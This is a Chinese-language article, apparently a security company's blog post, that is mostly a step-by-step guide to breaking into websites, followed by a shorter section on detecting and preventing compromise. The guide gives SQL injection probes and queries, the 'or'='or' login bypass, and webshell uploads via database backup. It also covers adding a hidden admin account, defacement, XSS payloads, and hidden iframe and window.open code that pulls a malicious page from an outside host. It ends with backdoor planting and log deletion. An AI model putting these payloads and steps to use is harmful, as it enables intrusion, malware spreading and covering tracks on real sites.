好多企業(yè)網(wǎng)站遭遇黑客攻擊，像黑客入侵在互聯(lián)網(wǎng)只要有數(shù)據(jù)網(wǎng)絡(luò)，就能使用數(shù)據(jù)網(wǎng)絡(luò)遠(yuǎn)程操作目標(biāo)的筆記本電腦、網(wǎng)絡(luò)服務(wù)器、企業(yè)網(wǎng)站，從而任意地讀取或篡改目標(biāo)的重要數(shù)據(jù)，又或者使用目標(biāo)系統(tǒng)軟件上的功能模塊，比如對手機(jī)的麥克風(fēng)開展監(jiān)聽，開啟對方攝像頭開展監(jiān)控，使用已經(jīng)被入侵的設(shè)備計(jì)算能力開展挖礦從而得到虛擬貨幣，使用目標(biāo)設(shè)備的網(wǎng)絡(luò)帶寬能力發(fā)動CC并發(fā)攻擊方式其他人等等！

一、 網(wǎng)站入侵的常規(guī)思路方法

1、經(jīng)典SQL注入

通常，判斷一個(gè)網(wǎng)站是否存在注入點(diǎn)，可以用'，and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,來判斷，如果and 1=1正常返回頁面，1=2錯(cuò)誤，或者找不到，那么就存在注入點(diǎn)。

2、萬能密碼OR漏洞

萬能密碼'or'='or',可以用在后臺管理輸入，有的網(wǎng)站由于沒有過濾OR漏洞，輸入OR直接就可以突破，一般漏洞存在于ASP類型的網(wǎng)站。

3、爆庫

爆庫，可以理解為爆出數(shù)據(jù)庫下載，用爆庫之類的工具可以直接就獲得管理員用戶和密碼，%5C為十六進(jìn)制的\符號，而數(shù)據(jù)庫大于5.0就可以進(jìn)行爆庫，如在PHP手工高級注入時(shí)，用VERSION（）這個(gè)變量猜出網(wǎng)站數(shù)據(jù)庫版本，如果一個(gè)網(wǎng)站數(shù)據(jù)庫大于5.0，且是ACESS數(shù)據(jù)庫，那么提交地址是：http://www.xxx.com/rpc/show24.asp?id=127,我們直接把%5C加到RPC后面，因?yàn)?5C是爆二級目錄，所以應(yīng)該是這樣，http://www.xxx.com/rpc%5c/show24.asp?id=127,而%23是代表#，如果管理員為了防止他人非法下載數(shù)據(jù)庫，而把數(shù)據(jù)庫改成#database.mdb,這樣防止了，如果頁面地址為http://www.xx.com/rpd/#database.mdb,是這樣的，那么我們把%23加到替換#,http://www.xx.com/rpd/%23database.mdb

4、COOKIE中轉(zhuǎn)，SQL防注入程序，提醒你IP已被記錄

COOKIE中轉(zhuǎn)，SQL防注入，如果檢測一個(gè)網(wǎng)站時(shí)，彈出這樣一個(gè)對話框，上面出現(xiàn)SQL防注入程序提醒的字語，那么我們可以利用COOKIE中轉(zhuǎn)，注入中轉(zhuǎn)來突破，方法是先搭建一個(gè)ASP環(huán)境（且網(wǎng)站為ASP網(wǎng)站），然后打開中轉(zhuǎn)工具，記住一個(gè)網(wǎng)站的頁面地址粘貼進(jìn)工具里，值是多少就寫多少，生成，把生成的文件放到目錄里，接下來，打開網(wǎng)頁，輸入http://127.0.0.1:(端口）/目錄里文件，如果正常，那么輸入http://127.0.0.1:端口/值（目錄文件）？提交值，那么拿到工具里猜表名，列名了。

5、手工

ASP手工語句表名 and exists (select * from 表名)

列名 and (select count(列名) from 表名)>0

長度 and (select top 1 len(username) from admin)>0

內(nèi)容 and (select top 1 asc(mid(username,1,1)) from admin)>100

PHP手工語句：order by（猜字段），and 1=2 union select （字段數(shù)）and 1=2 union selsect from(位置）

幾個(gè)常用變量 ，USER(),VERSION()<數(shù)據(jù)庫版本），database()<數(shù)據(jù)庫名稱>

6、抓包拿WEBSHELL

如果進(jìn)入后臺發(fā)現(xiàn)，點(diǎn)數(shù)據(jù)庫備份的時(shí)候發(fā)現(xiàn)找不到，可以通過抓包來獲得上傳，拿到WEBSHELL，工具WOSCK抓包，一張圖片，一個(gè)ASP馬，自行搭建一個(gè)上傳地址，UPLOAD加載，UPFILE上傳，COOKIS=（ ）

7、數(shù)據(jù)庫備份拿WEBSHELL和一句話木馬入侵

通常進(jìn)入后臺了，發(fā)現(xiàn)有數(shù)據(jù)庫備份，拿WEBSHELL吧，找一個(gè)添加產(chǎn)品的地方，傳一個(gè)大馬，格式為JPG圖片，然后把圖片地址粘貼到數(shù)據(jù)庫備份那里，給起個(gè)名字，如SHELL.ASP,然后合地址訪問的時(shí)候就進(jìn)入webshell了，一句話木馬入侵，先編輯記事本，加入一句話，改為2.jpg,然后備份，訪問，發(fā)現(xiàn)500內(nèi)部服務(wù)器錯(cuò)誤，證明一句話成功，接下來用一句話木馬客戶端連接，得到路徑頁面，然后改下馬名，輸入大馬內(nèi)容，提交，得到WEBSHELL!

8、DB權(quán)限差異備份拿WEBSHELL

如果一個(gè)網(wǎng)站注入點(diǎn)是MYSQL數(shù)據(jù)庫，且是DB權(quán)限，或者是SA權(quán)限，能夠列目錄，那么就好辦了，找到網(wǎng)站的目錄，目錄通常在D和E盤，備份個(gè)小馬，合地址訪問看看成功沒，直接備份大馬貌似不行，成功后，再輸入大馬內(nèi)容，拿到WEBSHELL!

9、找后臺

找后臺，一般默認(rèn)為admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp,login.asp,logon,user.asp,admin/index.asp,當(dāng)然，這只是默認(rèn)，一些大網(wǎng)站不可能還用admin作為后臺，有的隱藏很深，可以簡單用site:網(wǎng)站 inurl:后臺來猜，或者下載源HTML文件分析找出后臺，或者用各種工具來掃描了，方法很多的。

10、腳本提示

有的網(wǎng)站要求進(jìn)入后臺會出現(xiàn)一個(gè)腳本提示，就像VB編程里INPUTBOX ""，一個(gè)對話輸入框，我們輸入administrator突破，admin代表以管理員身份來進(jìn)入。

11、php后門和EWEBEDITOR編輯器入侵

PHP后門，如之前爆出的DISZ漏洞，在一個(gè)PHP網(wǎng)站后面加C.PHP,如果出現(xiàn)1，那么傳個(gè)PHP馬就拿到WEBSHELL，EWEBEDITOR編輯器入侵，是很快速的方式，設(shè)置好上傳文件類型，傳ASA，或者其他的格式，然后訪問拿到WEBSHELL，如沒有直接加語句拿到WEBSHELL。

12、上傳漏洞

有的網(wǎng)站雖然沒有注入點(diǎn)，但存在一個(gè)上傳漏洞，那么我們?nèi)绾蝸砝昧?，首先，打開上傳地址看是否存在，如果有，試想傳一個(gè)ASP大馬是不行的，那么傳一句話看看，先看能成功不，用明小子來上傳，動網(wǎng)，動力，動感，喬客4種方式，頁面地址格式要對應(yīng)，如果一個(gè)網(wǎng)站地址彈出對話框，顯示上傳成功，那么證明可以拿到WEBSHELL，傳馬，另外有的沒有任何顯示，直接空的，那么可以構(gòu)建兩個(gè)上傳，第一個(gè)傳JPG的圖片，第二個(gè)傳ASP馬（大馬），記住，大馬后面要有個(gè)空格才行，如果一個(gè)網(wǎng)站地址出現(xiàn)文件類型不正確，請重新上傳，那么證明%90可以拿到WEBSHELL，只是格式不對，不允許，改后綴，只要是網(wǎng)站沒有過濾的格式，如果一個(gè)網(wǎng)站地址顯示請登陸再上傳，那么證明沒有拿到COOKIS，思路是在該網(wǎng)站注冊一個(gè)用戶，得到COOKIS，然后上傳就成功了。

13、簡單提權(quán)拿下服務(wù)器和SERV提權(quán)和pcanywhere三方提權(quán)

簡單拿下服務(wù)器，也就是拿下網(wǎng)站IP主機(jī)，首先我們需要一個(gè)WEBSHELL，然后看看組件信息，看看路徑可讀可以寫不，如果有一個(gè)可以，那么來到CMD命令下，首先輸入可寫的文件內(nèi)容，執(zhí)行命令加一個(gè)帳號和最高管理權(quán)限，然后輸入netstat -an,得到主機(jī)連接端口，然后用3389連接進(jìn)入，讓其成為肉雞（最好），這樣比較隱蔽我們操作。

14、反查入侵和旁注和社會工程學(xué)

反查IP入侵，也就是入侵21，端口，首先我們?nèi)肭志W(wǎng)站先PING WWW.XXX.COM ,出IP，然后到反查IP站點(diǎn)查掛了多少個(gè)域名，接下來，添加webmaster@地址，加入字典，（里面多收集可能的口令，如123，321，456），然后用流光探測密碼，登陸ftp://ip,輸入用戶和密碼，改掉信息等等，社會工程學(xué)X-WAY，來得到FTP密碼，也需要收集，并不是每個(gè)都行，總之是自己的經(jīng)驗(yàn)。

15、跨站腳本攻擊

跨站（XSS），被動攻擊，現(xiàn)在需要更多的思路和經(jīng)驗(yàn)了

三段經(jīng)典跨站代碼

<script>alert("跨站開始")</script>

<script>alert("document.cookie")</script>

<script>window.open(http://www.hackgirl.net)</script>

16、特殊空格

利用TAB制作的特殊空格，然后注冊時(shí)輸入空格，加管理名字，隨便在網(wǎng)站上找個(gè)斑竹，或者管理的名字，這樣來注冊，有時(shí)自己注冊的這個(gè)也會變成管理員。

17、改主頁

改主頁，拿到WEBSHELL后，先找出首頁文件，一般為index.asp,index.php.index.jsp,index.html,然后來到站點(diǎn)根目錄，編輯index.asp(首頁），清空，最好備份，輸入自己的主頁代碼（黑頁），保存，再訪問時(shí)已經(jīng)變成自己想要的結(jié)果了。

18、掛馬

首先在WEBSHELL里，建立一個(gè)文本，改為1.htm,接下來在主頁最下面掛

兩段經(jīng)典掛馬代碼

<html>

<iframe src="http://www.xxxx.com/2.htm" width="0" height="0" frameborder="0"></iframe>

</html>

<SCRIPT language=javascript>

window.open("http://www.xxx.com/2.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");

</script>

二、 網(wǎng)站入侵基本流程

1、信息收集

1) Whois信息--注冊人、電話、郵箱、DNS、地址

2) Googlehack--敏感目錄、敏感文件、后臺地址

3) 服務(wù)器IP--Nmap掃描、端口對應(yīng)的服務(wù)、C段

4) 旁注--Bing查詢、腳本工具

5) 如果遇到CDN--Cloudflare（繞過）、從子域入手（mail，postfix）、DNS傳送域漏洞

6) 服務(wù)器、組件（指紋）--操作系統(tǒng)、web server（apache，nginx，iis）、腳本語言，數(shù)據(jù)庫類型

2、漏洞挖掘

1) 探測Web應(yīng)用指紋--如博客類：Wordpress、Emlog、Typecho、Z-blog，社區(qū)類：Discuz、PHPwind、Dedecms，StartBBS、Mybb等等，PHP腳本類型：Dedecms、Discuz!、PHPCMS、PHPwind

2) XSS、CSRF、SQLinjection、權(quán)限繞過、任意文件讀取、文件包含...

3) 上傳漏洞--截?cái)?、修改、解析漏?/p>

4) 有無驗(yàn)證碼--進(jìn)行暴力破解

3、漏洞利用

1) 思考目的性--達(dá)到什么樣的效果

2) 隱藏，破壞性--根據(jù)探測到的應(yīng)用指紋尋找對應(yīng)的exp攻擊載荷或者自己編寫

3) 開始漏洞攻擊，獲取相應(yīng)權(quán)限，根據(jù)場景不同變化思路拿到webshell

4、權(quán)限提升

1) 根據(jù)服務(wù)器類型選擇不同的攻擊載荷進(jìn)行權(quán)限提升

2) 無法進(jìn)行權(quán)限提升，結(jié)合獲取的資料開始密碼猜解，回溯信息收集

5、植入后門

1) 隱蔽性

2) 定期查看并更新，保持周期性

6、日志清理

1) 偽裝，隱蔽，避免激警他們通常選擇刪除指定日志

2) 根據(jù)時(shí)間段，find相應(yīng)日志文件 太多太多。

三、如何判斷網(wǎng)站是否被黑？如何應(yīng)對網(wǎng)站被黑？如何防止網(wǎng)站被黑？

1、如何判斷網(wǎng)站是否被黑？

如果存在下列問題，則您的網(wǎng)站可能已經(jīng)被黑客攻擊：

1) 通過site命令查詢站點(diǎn)，顯示搜索引擎收錄了大量非本站應(yīng)有的頁面。

2) 從百度搜索結(jié)果中點(diǎn)擊站點(diǎn)的頁面，跳轉(zhuǎn)到了其他站點(diǎn)。

3) 站點(diǎn)內(nèi)容在搜索結(jié)果中被提示存在風(fēng)險(xiǎn)。

4) 從搜索引擎帶來的流量短時(shí)間內(nèi)異常暴增。

一旦發(fā)現(xiàn)上述異常，建議您立即對網(wǎng)站進(jìn)行排查。包括：

1、分析系統(tǒng)和服務(wù)器日志，檢查自己站點(diǎn)的頁面數(shù)量、用戶訪問流量等是否有異常波動，是否存在異常訪問或操作日志;

2、檢查網(wǎng)站文件是否有不正常的修改，尤其是首頁等重點(diǎn)頁面;

3、網(wǎng)站頁面是否引用了未知站點(diǎn)的資源(圖片、JS等)，是否被放置了異常鏈接;

4、檢查網(wǎng)站是否有不正常增加的文件或目錄;

5、檢查網(wǎng)站目錄中是否有非管理員打包的網(wǎng)站源碼、未知txt文件等。

2、如何應(yīng)對網(wǎng)站被黑？

如果排查確認(rèn)您的網(wǎng)站存在異常，此時(shí)您需要立即做出處理，包括：

1) 立即停止網(wǎng)站服務(wù)，避免用戶繼續(xù)受影響，防止繼續(xù)影響其他站點(diǎn)(建議使用503返回碼)。

2) 如果同一主機(jī)提供商同期內(nèi)有多個(gè)站點(diǎn)被黑，您可以聯(lián)系主機(jī)提供商，敦促對方做出應(yīng)對。

3) 清理已發(fā)現(xiàn)的異常，排查出可能的被黑時(shí)間，和服務(wù)器上的文件修改時(shí)間相比對，處理掉黑客上傳、修改過的文件;檢查服務(wù)器中的用戶管理設(shè)置，確認(rèn)是否存在異常的變化;更改服務(wù)器的用戶訪問密碼。

注：可以從訪問日志中，確定可能的被黑時(shí)間。不過黑客可能也修改服務(wù)器的訪問日志。

4) 做好安全工作，排查網(wǎng)站存在的漏洞，防止再次被黑。

3、如何防止網(wǎng)站被黑？

1) 為避免您的網(wǎng)站被黑客攻擊，您需要在平時(shí)做大量的工作，例如

2) 定期檢查服務(wù)器日志，檢查是否有可疑的針對非前臺頁面的訪問。

3) 經(jīng)常檢查網(wǎng)站文件是否有不正常的修改或者增加。

4) 關(guān)注操作系統(tǒng)，以及所使用程序的官方網(wǎng)站。如果有安全更新補(bǔ)丁出現(xiàn)，應(yīng)立即部署，不使用官方已不再積極維護(hù)的版本，如果條件允許，建議直接更新至最新版;關(guān)注建站程序方發(fā)布的的安全設(shè)置準(zhǔn)則。

5) 系統(tǒng)漏洞可能出自第三方應(yīng)用程序，如果網(wǎng)站使用了這些應(yīng)用程序，建議仔細(xì)評估其安全性。

6) 修改開源程序關(guān)鍵文件的默認(rèn)文件名，黑客通常通過自動掃描某些特定文件是否存在的方式來判斷是否使用了某套程序。

7) 修改默認(rèn)管理員用戶名，提高管理后臺的密碼強(qiáng)度，使用字母、數(shù)字以及特殊符號多種組合的密碼，并嚴(yán)格控制不同級別用戶的訪問權(quán)限。

8) 選擇有實(shí)力保障的主機(jī)服務(wù)提供商。

9) 關(guān)閉不必要的服務(wù)，以及端口。

10) 關(guān)閉或者限制不必要的上傳功能。

11) 設(shè)置防火墻等安全措施。

12) 若被黑問題反復(fù)出現(xiàn)，建議重新安裝服務(wù)器操作系統(tǒng)，并重新上傳備份的網(wǎng)站文件。

總結(jié)

企業(yè)網(wǎng)站存在漏洞被黑客攻擊的分析定義比如站點(diǎn)sql語句注入、XSS等好多不可以GetShell的網(wǎng)站攻擊方式，暫且不再小范圍的“漏洞掃描”考慮范疇，提議可以劃歸“安全漏洞”、“威協(xié)認(rèn)知”等行業(yè)，再行再做討論。這樣的話，依照sql語句注入、XSS等通道，開展了GetShell實(shí)際操作的，我們主要問題還是在GetShell這一關(guān)鍵環(huán)節(jié)，無須在意安全漏洞通道在哪里

本文鏈接：http://www.hkass.cn/article/1033.html